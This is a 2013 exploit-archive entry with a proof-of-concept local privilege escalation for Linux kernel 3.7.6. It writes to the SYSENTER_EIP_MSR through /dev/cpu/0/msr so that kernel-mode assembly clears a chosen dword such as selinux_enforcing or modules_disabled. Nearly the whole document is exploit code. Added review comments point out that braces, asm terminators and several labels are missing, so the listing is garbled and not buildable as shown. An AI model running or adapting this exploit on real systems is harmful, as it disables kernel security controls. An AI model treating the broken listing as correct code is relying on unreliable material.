Linux Kernel 3.7.6 (RedHat x86/x64) - MSR Driver Privilege Escalation

Type exploitpack
Reporter spender
Modified 2013-08-02T00:00:00


Linux Kernel 3.7.6 (RedHat x86/x64) - MSR Driver Privilege Escalation

// PoC exploit for /dev/cpu/*/msr, 32-bit userland on a 64-bit host
// can do whatever in the commented area, re-enable module support, etc.
// requires CONFIG_X86_MSR and just uid 0
// a small race exists between the time the MSR is first written
// and the time we issue our sysenter
// we additionally require CAP_SYS_NICE to make winning the race nearly guaranteed
// takes one hex argument: the address of a dword to set to 0
// (modules_disabled, selinux_enforcing, take your pick)
// Hello to Red Hat, who has shown yet again to not care until a 
// public exploit is released.  Not even a bugtraq entry existed in 
// their system until this was published -- and they have a paid team
// of how many?
// It's not as if I didn't mention the problem and existence of an easy 
// exploit multiple times prior:
// spender 2013

#define _GNU_SOURCE
#include <stdio.h>
#include <sched.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <stdlib.h>
#include <sys/time.h>
#include <sys/resource.h>
#include <sys/mman.h>

// MSR index used by main() as the file offset when seeking in the msr
// device; the assembly in ring0() hard-codes the same value (0x176).
#define SYSENTER_EIP_MSR 0x176

// Value read from the MSR device by main(); printed as the "Old" value and
// copied into payload_data[0].
u_int64_t msr;

// Buffer whose address main() loads into ecx; ring0() then moves ecx into
// esp, i.e. uses this buffer as its stack.
unsigned long ourstack[65536];

// Parameter block whose address main() loads into ebx for ring0():
//   [0] = MSR value read at startup (read by ring0 at [rbx] / [rbx+4])
//   [1] = target address parsed from argv[1], or 0 (read at [rbx+8])
// Only these two of the 16 slots are written in the visible code.
u_int64_t payload_data[16];

// Symbols named by the .globl/.global directives inside ring0()'s asm.
// NOTE(review): declared as `void *` objects, so the bare name `_ring0`
// evaluates to the pointer-sized value stored AT the symbol, while
// `&_ring0` is the symbol's address — main() uses both forms; confirm intent.
extern void *_ring0;
extern void *_ring0_end;

/*
 * ring0 - assembly payload whose address main() writes into
 * SYSENTER_EIP_MSR (main stores &_ring0 there).
 *
 * Register contract, as set up by the asm block in main():
 *   ecx = address of ourstack
 *   ebx = address of payload_data
 *
 * Visible behaviour: switch the stack pointer to ecx, save rax/rbx/rcx/rdx,
 * load payload_data[1] and, if it is non-zero, store a 32-bit zero at that
 * address; then load the saved MSR value and index into edx:eax / ecx and
 * pop the saved registers.
 *
 * NOTE(review): this listing is incomplete. The function braces and the
 * closing of the asm statement are not present, and the labels it refers to
 * (_ring0, skip_write, _ring0_end) are declared or jumped to but never
 * defined in the visible text. Other lines may be missing as well; do not
 * treat this block as buildable or behaviourally complete as shown.
 */
void ring0(void)
__asm volatile(".globl _ring0\n"
	".intel_syntax noprefix\n"
	// set up stack pointer with 'ourstack'
	// (ecx was loaded with the address of ourstack by main)
	"mov esp, ecx\n"
	// save registers, contains the original MSR value
	"push rax\n"
	"push rbx\n"
	"push rcx\n"
	"push rdx\n"
	// play with the kernel here with interrupts disabled!
	// rcx = payload_data[1] (8 bytes past rbx): the address given on the
	// command line, or 0 when no argument was supplied
	"mov rcx, qword ptr [rbx+8]\n"
	"test rcx, rcx\n"
	// zero address: skip the store (label not defined in the visible text)
	"jz skip_write\n"
	// clear the 32-bit value at the target address
	"mov dword ptr [rcx], 0\n"
	// restore MSR value before returning
	// ecx = MSR index, eax/edx = low/high dwords of payload_data[0]
	"mov ecx, 0x176\n" // SYSENTER_EIP_MSR
	"mov eax, dword ptr [rbx]\n"
	"mov edx, dword ptr [rbx+4]\n"
	// restore the registers saved above (reverse order of the pushes)
	"pop rdx\n"
	"pop rcx\n"
	"pop rbx\n"
	"pop rax\n"
	".att_syntax prefix\n"
        ".global _ring0_end\n"

// Holds the user-mode esp: main()'s asm block stores esp here before loading
// the payload's registers and reloads esp from here afterwards.
unsigned long saved_stack;

/*
 * main - driver for the proof of concept.
 *
 * Visible steps: parse an optional hex address from argv[1]; mlock the
 * payload code and payload_data; request SCHED_FIFO priority 99 and affinity
 * to CPU 0; open the CPU 0 msr device; read the current value at offset
 * SYSENTER_EIP_MSR; write the address of _ring0 in its place; then run an
 * asm block that loads ecx/edx/ebx for ring0().
 *
 * argv[1] (optional): hexadecimal address; stored in payload_data[1].
 * With no argument, payload_data[1] stays 0 and ring0() skips its store.
 *
 * NOTE(review): this listing is incomplete. The function's braces, the
 * bodies/closings of every error branch (no exit or return is visible after
 * the fprintf calls) and the terminator of the asm statement are absent, and
 * `label2` is referenced but not defined. Do not treat it as buildable as
 * shown.
 */
int main(int argc, char *argv[])
	cpu_set_t set;
	int msr_fd;
	int ret;
	u_int64_t new_msr;
	struct sched_param sched;
	u_int64_t resolved_addr = 0ULL;

	// optional target address, parsed as base-16; no validation of the input
	if (argc == 2)
		resolved_addr = strtoull(argv[1], NULL, 16);

	/* can do this without privilege */
	// NOTE(review): `_ring0` is declared `extern void *`, so these
	// expressions use the value stored at the symbol rather than the
	// symbol's address (compare `&_ring0` further down) — confirm intent.
	// Return values of mlock are not checked.
	mlock(_ring0, (unsigned long)_ring0_end - (unsigned long)_ring0);
	mlock(&payload_data, sizeof(payload_data));

	// NOTE(review): `set` is never cleared (no CPU_ZERO visible) before
	// CPU 0 is added, so its other bits are indeterminate.
	CPU_SET(0, &set);

	sched.sched_priority = 99;

	// real-time FIFO scheduling at priority 99 for the calling process
	ret = sched_setscheduler(0, SCHED_FIFO, &sched);
	if (ret) {
		fprintf(stderr, "Unable to set priority.\n");

	// restrict the calling process to the CPUs in `set`
	ret = sched_setaffinity(0, sizeof(cpu_set_t), &set);
	if (ret) {
		fprintf(stderr, "Unable to set affinity.\n");

	// try the primary device path first, then the alternate name
	msr_fd = open("/dev/cpu/0/msr", O_RDWR);
	if (msr_fd < 0) {
		msr_fd = open("/dev/msr0", O_RDWR);
		if (msr_fd < 0) {
			fprintf(stderr, "Unable to open /dev/cpu/0/msr\n");
	// the file offset is the MSR index; read the current 8-byte value
	lseek(msr_fd, SYSENTER_EIP_MSR, SEEK_SET);
	ret = read(msr_fd, &msr, sizeof(msr));
	if (ret != sizeof(msr)) {
		fprintf(stderr, "Unable to read /dev/cpu/0/msr\n");

	// stuff some addresses in a buffer whose address we
	// pass to the "kernel" via register
	payload_data[0] = msr;
	payload_data[1] = resolved_addr;

	// NOTE(review): %llx expects unsigned long long; whether u_int64_t
	// matches depends on the target ABI — confirm or cast.
	printf("Old SYSENTER_EIP_MSR = %016llx\n", msr);

	// seek back to the same MSR index and prepare the replacement value:
	// the address of the _ring0 symbol, widened to 64 bits
	lseek(msr_fd, SYSENTER_EIP_MSR, SEEK_SET);
	new_msr = (u_int64_t)(unsigned long)&_ring0;

	printf("New SYSENTER_EIP_MSR = %016llx\n", new_msr);

	ret = write(msr_fd, &new_msr, sizeof(new_msr));
	if (ret != sizeof(new_msr)) {
		fprintf(stderr, "Unable to modify /dev/cpu/0/msr\n");

	// Register setup for ring0(): remember esp in saved_stack, then
	// ecx = &ourstack, edx = address of label2, ebx = &payload_data,
	// and finally reload esp from saved_stack.
	// No operands or clobbers are declared for this asm statement.
	__asm volatile(
		".intel_syntax noprefix\n"
		"mov saved_stack, esp\n"
		"lea ecx, ourstack\n"
		"lea edx, label2\n"
		"lea ebx, payload_data\n"
		"mov esp, saved_stack\n"
		".att_syntax prefix\n"

	return 0;